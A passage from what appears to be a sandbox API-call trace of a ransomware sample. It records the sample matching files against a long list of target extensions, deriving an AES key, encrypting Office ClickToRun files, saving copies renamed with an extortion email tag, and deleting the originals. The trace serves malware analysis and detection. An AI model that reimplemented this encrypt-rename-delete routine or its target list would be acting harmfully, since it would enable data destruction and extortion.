returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0164.104] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0164.104] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0164.104] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0164.106] ReadFile (in: hFile=0x39c, lpBuffer=0xfdf190, nNumberOfBytesToRead=0x5220, lpNumberOfBytesRead=0x189930, lpOverlapped=0x0 | out: lpBuffer=0xfdf190*, lpNumberOfBytesRead=0x189930*=0x5220, lpOverlapped=0x0) returned 1
	[0164.111] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.111] CryptAcquireContextW (in: phProv=0x1894e0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1894e0*=0xfcb5d8) returned 1
	[0164.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.114] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1894e4 | out: phHash=0x1894e4) returned 1
	[0164.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.114] CryptHashData (hHash=0xfb9330, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0164.114] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.114] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb9330, dwFlags=0x1, phKey=0x1894e8 | out: phKey=0x1894e8*=0xfb9530) returned 1
	[0164.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.115] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x1894fc*=0x5220, dwBufLen=0x5220 | out: pbData=0x0*, pdwDataLen=0x1894fc*=0x5230) returned 1
	[0164.115] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0164.115] RtlMoveMemory (in: Destination=0xfe43b8, Source=0xfdf190, Length=0x5220 | out: Destination=0xfe43b8) 
	[0164.115] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.115] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe43b8*, pdwDataLen=0x1894dc*=0x5220, dwBufLen=0x5230 | out: pbData=0xfe43b8*, pdwDataLen=0x1894dc*=0x5230) returned 1
	[0164.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.116] CryptDestroyKey (hKey=0xfb9530) returned 1
	[0164.116] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.117] CryptDestroyHash (hHash=0xfb9330) returned 1
	[0164.117] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.117] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0164.117] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0164.117] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1894f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1894f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0164.118] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0164.118] GetUserNameA (in: lpBuffer=0x1893dc, pcbBuffer=0x1894f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1894f4) returned 1
	[0164.119] wsprintfW (in: param_1=0x189510, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 156
	[0164.119] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3a0
	[0164.120] WriteFile (in: hFile=0x3a0, lpBuffer=0xfe43b8*, nNumberOfBytesToWrite=0x5230, lpNumberOfBytesWritten=0x189938, lpOverlapped=0x0 | out: lpBuffer=0xfe43b8*, lpNumberOfBytesWritten=0x189938*=0x5230, lpOverlapped=0x0) returned 1
	[0164.126] CloseHandle (hObject=0x3a0) returned 1
	[0164.128] CloseHandle (hObject=0x39c) returned 1
	[0164.128] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml")) returned 1
	[0164.133] DeleteFileW (lpFileName="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\masterdescriptor.x-none.xml")) returned 0
	[0164.133] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5876774, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd5876774, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x341a3500, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x66, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="s320.hash", cAlternateFileName="S320~1.HAS")) returned 1
	[0164.133] lstrcmpW (lpString1="s320.hash", lpString2="..") returned 1
	[0164.133] lstrcmpW (lpString1="s320.hash", lpString2=".") returned 1
	[0164.133] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\"
	[0164.133] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\", lpString2="s320.hash" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\s320.hash") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\s320.hash"
	[0164.134] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\s320.hash") returned 96
	[0164.134] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0164.134] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\s320.hash", cchLength=0x60 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\s320.hash") returned 0x60
	[0164.134] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.134] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\s320.hash", lpSrch="help_decrypt_your_files") returned 0x0
	[0164.134] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\s320.hash" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\s320.hash") returned="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\s320.hash"
	[0164.134] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\s320.hash") returned 96
	[0164.135] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0164.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.135] StrStrW (lpFirst=".hash", lpSrch=".") returned=".hash"
	[0164.135] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.135] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".hash") returned 0x0
	[0164.136] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd587a18c, ftCreationTime.dwHighDateTime=0x1d8a64a, ftLastAccessTime.dwLowDateTime=0xd587a18c, ftLastAccessTime.dwHighDateTime=0x1d8a64a, ftLastWriteTime.dwLowDateTime=0x32e90800, ftLastWriteTime.dwHighDateTime=0x1d0d7f0, nFileSizeHigh=0x0, nFileSizeLow=0x38b5ce, dwReserved0=0x2a005c, dwReserved1=0x2a002e, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1
	[0164.136] lstrcmpW (lpString1="stream.x86.x-none.man.dat", lpString2="..") returned 1
	[0164.136] lstrcmpW (lpString1="stream.x86.x-none.man.dat", lpString2=".") returned 1
	[0164.136] lstrcpyW (in: lpString1=0x18a3d4, lpString2="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\"
	[0164.136] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\", lpString2="stream.x86.x-none.man.dat" | out: lpString1="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\stream.x86.x-none.man.dat") returned="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\stream.x86.x-none.man.dat"
	[0164.136] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\stream.x86.x-none.man.dat") returned 112
	[0164.136] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0164.136] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\ClickToRun\\9566930B-D1DD-4075-BFE6-74DD69B13189\\x-none.16\\stream.x86.x-none.man.dat", cchLength=0x70 | out: lpsz="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat") returned 0x70
	[0164.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.137] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat", lpSrch="help_decrypt_your_files") returned 0x0
	[0164.137] lstrcpyW (in: lpString1=0x189f7c, lpString2="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat" | out: lpString1="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat") returned="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat"
	[0164.137] lstrlenW (lpString="c:\\users\\all users\\microsoft\\clicktorun\\9566930b-d1dd-4075-bfe6-74dd69b13189\\x-none.16\\stream.x86.x-none.man.dat") returned 112
	[0164.137] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0164.137] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.138] StrStrW (lpFirst=".dat", lpSrch=".") returned=".dat"
	[0164.138] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0164.138] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.p